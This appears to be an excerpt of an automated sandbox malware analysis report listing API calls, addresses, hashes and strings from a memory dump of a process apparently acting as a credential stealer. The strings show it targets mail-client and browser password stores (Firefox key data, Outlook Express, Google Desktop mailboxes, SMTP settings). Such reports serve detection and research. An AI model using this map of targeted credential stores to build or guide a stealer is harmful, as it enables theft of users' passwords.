                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmp$memcpy
                                                  • String ID: global-salt$password-check
                                                  • API String ID: 231171946-3927197501
                                                  • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                  • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                  • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                  • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                  APIs
                                                  • memset.MSVCRT ref: 0040644F
                                                  • memcpy.MSVCRT ref: 00406462
                                                  • memcpy.MSVCRT ref: 00406475
                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                    • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                                    • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                                  • memcpy.MSVCRT ref: 004064B9
                                                  • memcpy.MSVCRT ref: 004064CC
                                                  • memcpy.MSVCRT ref: 004064F9
                                                  • memcpy.MSVCRT ref: 0040650E
                                                    • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID:
                                                  • API String ID: 438689982-0
                                                  • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                  • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                  • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                  • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                  APIs
                                                    • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                  • memset.MSVCRT ref: 0040330B
                                                  • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                  • strchr.MSVCRT ref: 0040335A
                                                    • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                  • strlen.MSVCRT ref: 0040339C
                                                    • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                  • String ID: Personalities
                                                  • API String ID: 2103853322-4287407858
                                                  • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                  • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                  • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                  • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                  APIs
                                                  • GetParent.USER32(?), ref: 004090C2
                                                  • GetWindowRect.USER32(?,?), ref: 004090CF
                                                  • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$Rect$ClientParentPoints
                                                  • String ID:
                                                  • API String ID: 4247780290-0
                                                  • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                  • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                  • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                  • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _strcmpi$_mbscpy
                                                  • String ID: smtp
                                                  • API String ID: 2625860049-60245459
                                                  • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                  • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                  • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                  • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                  APIs
                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                  • memset.MSVCRT ref: 00408258
                                                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                  Strings
                                                  • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Close$EnumOpenmemset
                                                  • String ID: Software\Google\Google Desktop\Mailboxes
                                                  • API String ID: 2255314230-2212045309
                                                  • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                  • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                  • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                  • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                  APIs
                                                  • memset.MSVCRT ref: 0040C28C
                                                  • SetFocus.USER32(?,?), ref: 0040C314
                                                    • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                  Strings
                                                  Similarity
                                                  • API ID: FocusMessagePostmemset
                                                  • String ID: S_@$l
                                                  APIs
                                                  • memset.MSVCRT ref: 004092C0
                                                  • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                  • _mbscpy.MSVCRT ref: 004092FC
                                                  Strings
                                                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                  Similarity
                                                  • API ID: PrivateProfileString_mbscpymemset
                                                  • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                  APIs
                                                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                  • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                  Strings
                                                  Similarity
                                                  • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                  • String ID: MS Sans Serif
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: ClassName_strcmpimemset
                                                  • String ID: edit
                                                  APIs
                                                  Similarity
                                                  • API ID: ??2@$memset
                                                  • String ID:
                                                  APIs
                                                  Similarity
                                                  • API ID: memset$memcpy
                                                  • String ID:
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: @
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: _strcmpi
                                                  • String ID: C@$mail.identity
                                                  APIs
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: _ultoasprintf
                                                  • String ID: %s %s %s
                                                  APIs
                                                  • LoadMenuA.USER32(00000000), ref: 00409078
                                                  • sprintf.MSVCRT ref: 0040909B
                                                    • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                    • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                    • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                    • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                    • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                  Strings
                                                  Similarity
                                                  • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                  • String ID: menu_%d
                                                  APIs
                                                  • _mbscpy.MSVCRT ref: 004070EB
                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                  • _mbscat.MSVCRT ref: 004070FA
                                                  Strings
                                                  Similarity
                                                  • API ID: _mbscat$_mbscpystrlen
                                                  • String ID: sqlite3.dll
                                                  APIs
                                                  • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                  Strings
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID: A4@$Server Details
                                                  APIs
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: